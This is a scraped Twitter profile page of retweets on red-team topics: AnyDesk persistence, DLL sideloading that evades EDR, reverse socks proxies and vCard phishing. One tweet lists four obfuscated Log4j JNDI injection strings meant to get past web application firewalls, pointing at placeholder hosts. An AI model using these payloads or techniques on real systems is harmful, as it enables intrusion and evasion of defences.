Joined October 2018
- Tweets 27
- Following 540
- Followers 112
- Likes 21
7 Photos and videos
Pathocode retweeted
13 Aug 2022
[#HackTip ⚒] Looking for a legitimate way of achieving #persistence on Windows? How about #AnyDesk silent deployment? 😉
12
212
792
Apache Log4j2 2.14.1 RCE (CVE-2021-44228)
‼️Bypass WAF
1. ${jndi:ldap://127.0.0.1:1389/ badClassName}
2. ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
3. ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
4. ${jndi:rmi://adsasd.asdasd.asdasd}
17
427
1,289
Pathocode retweeted
21 Aug 2021
(1/2) TL;DR "DLL sideloading attack is the most successful
attack as most EDRs fail to detect, let alone block, it." A scholarly and unbiased examination of how top EDR detects APT threats by @MDPIOpenAccess mdpi.com/2624-800X/1/3/21/pd…
8
194
502
Pathocode retweeted
12 Sep 2019
Procdump alternative that may come handy during #redteam
github.com/Mr-Un1k0d3r/MiniD…
There is a C and a C# version that can be used with execute-assembly
❤
2
152
365
Pathocode retweeted
17 Apr 2019
Finally built the proxmark3 portable and wireless. And here it goes:
RpiZeroW PM3 PCB with 5volt 1.5 Amp battery support 2500 mAh Battery which lasts 8 hours @herrmann1001. Not as small as @RfidGroup though #proxmark3
vimeo.com/331070259
3
12
62
Pathocode retweeted
12 Mar 2019
We finally published our Outlook addin to notify suspicious mails to security teams.
It's of course linked to SwordPhish to monitor your awareness campaigns.
github.com/certsocietegenera…
1
134
206
Pathocode retweeted
4 Feb 2019
HoleySocks, a cross-platform reverse socks proxy, now rewritten as a go package so it can be imported into other projects. Even went and used it an a reverse shell/agent.
#pivot #redteam #golang
github.com/audibleblink/Hole…
github.com/audibleblink/gors…
1
69
111
Detect pressed keys via microphone audio capture in real-time. Uses training data captured by typing first. Very neat!
github.com/ggerganov/kbd-aud…
Based on ideas in this classic traffic analysis paper: Timing Analysis of Keystrokes and Timing Attacks on SSH people.eecs.berkeley.edu/~da…
39
1,626
3,339
17 Jan 2019
Not a silver bullet, but it is possible to weaponize #vCard vulnerability with Office Document. PoC. #redteam #phishing #pentest #cobaltstrike
1
12
16
15 Jan 2019
As a #redteam, we need to be one step ahead of the blue team. Therefore, our #phishing attacks must be more sophisticated in order keep up with the game. Using #vcard, to compromise endpoints. #pentest #cobaltstrike
4
41
78
Pathocode retweeted
28 Nov 2018
Active Directory forests are no longer a security boundary thanks to @tifkin_'s printer bug. Check out posts.specterops.io/not-a-se… for weaponization and mitigation details and @Cyb3rWard0g's post for detection guidance posts.specterops.io/hunting-…
18
774
1,188
Pathocode retweeted
20 Nov 2018
A #Gmail glitch allows a hacker to send anonymous emails.
The trick could be weaponized for #phishing attacks that purport to be official warnings or system messages.
threatpost.com/gmail-glitch-…
61
43
Here are some RCE & VM escape exploits that I have written this year: github.com/niklasb/sploits
Amongst them some JSC bugs that found unfortunately untimely deaths
4
354
709
Pathocode retweeted
16 Nov 2018
MS ActiveDirectory module can now be loaded without touching disk, Thanks to a PR from @D1iv3 #RedTeam #ActiveDirectory
github.com/samratashok/ADMod…
63
138
Full version of the new Bcash CSW episode of "Blockchain and Morty" is now available on @BitTubeApp!
✌️♥️🚀
bit.tube/play?hash=QmfBA3m9o…
12
46